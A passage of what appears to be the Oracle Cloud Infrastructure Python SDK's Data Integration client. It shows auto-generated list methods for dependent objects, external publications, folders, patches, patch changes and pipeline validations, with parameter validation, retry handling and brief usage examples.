__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DependentObjectSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_dependent_objects.py.html>`__ to see an example of how to use list_dependent_objects API.
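A minimal sketch of type filtering (the type value is an illustrative guess; check the service documentation for the exact type names):

.. code-block:: python

    response = client.list_dependent_objects(
        workspace_id,
        application_key,
        type=["TASK"],           # hypothetical type value
        type_in_subtree="true")  # also consider subtypes of the given type
    for dependent_object in response.data.items:
        print(dependent_object)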
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/dependentObjects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"fields",
"name",
"identifier",
"type",
"type_in_subtree",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_dependent_objects got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"typeInSubtree": kwargs.get("type_in_subtree", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DependentObjectSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DependentObjectSummaryCollection")
def list_external_publication_validations(self, workspace_id, task_key, **kwargs):
"""
Retrieves a list of external publication validations in a workspace and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_external_publication_validations.py.html>`__ to see an example of how to use list_external_publication_validations API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_external_publication_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationValidationSummaryCollection")
def list_external_publications(self, workspace_id, task_key, **kwargs):
"""
Retrieves a list of external publications in an application and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_external_publications.py.html>`__ to see an example of how to use list_external_publications API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"fields",
"name",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_external_publications got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ExternalPublicationSummaryCollection")
def list_folders(self, workspace_id, **kwargs):
"""
Retrieves a list of folders in a project and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str aggregator_key: (optional)
Used to filter by the project or the folder object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.FolderSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_folders.py.html>`__ to see an example of how to use list_folders API.
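A minimal sketch of scoping the listing to a single project (the aggregator key is an illustrative placeholder):

.. code-block:: python

    response = client.list_folders(
        workspace_id,
        aggregator_key="example-project-key",  # hypothetical project key
        sort_by="TIME_CREATED")
    for folder in response.data.items:
        print(folder.name)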
"""
resource_path = "/workspaces/{workspaceId}/folders"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"aggregator_key",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_folders got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"aggregatorKey": kwargs.get("aggregator_key", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="FolderSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="FolderSummaryCollection")
def list_patch_changes(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of patch changes in an application and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str name: (optional)
Used to filter by the name of the object.
:param str since_patch: (optional)
Specifies the patch key to query from.
:param str to_patch: (optional)
Specifies the patch key to query to.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PatchChangeSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_patch_changes.py.html>`__ to see an example of how to use list_patch_changes API.
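A minimal sketch of querying the changes between two patches (both patch keys are illustrative placeholders):

.. code-block:: python

    response = client.list_patch_changes(
        workspace_id,
        application_key,
        since_patch="example-older-patch-key",  # hypothetical patch key
        to_patch="example-newer-patch-key")     # hypothetical patch key
    for change in response.data.items:
        print(change)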
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patchChanges"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"since_patch",
"to_patch",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_patch_changes got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"sincePatch": kwargs.get("since_patch", missing),
"toPatch": kwargs.get("to_patch", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchChangeSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchChangeSummaryCollection")
def list_patches(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of patches in an application and provides options to filter the list. To list the changes made over a period and the logical objects changed, see the ListPatchChanges API.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PatchSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_patches.py.html>`__ to see an example of how to use list_patches API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"name",
"identifier",
"fields",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_patches got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PatchSummaryCollection")
def list_pipeline_validations(self, workspace_id, **kwargs):
"""
Retrieves a list of pipeline validations within the specified workspace.
:param str workspace_id: (required)
The workspace ID.
:param str key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param str identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineValidationSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_pipeline_validations.py.html>`__ to see an example of how to use list_pipeline_validations API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"fields",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_pipeline_validations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": kwargs.get("key", missing),
"name": kwargs.get("name", missing),
"identifier": kwargs.get("identifier", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"page": kwargs.get("page", missing),
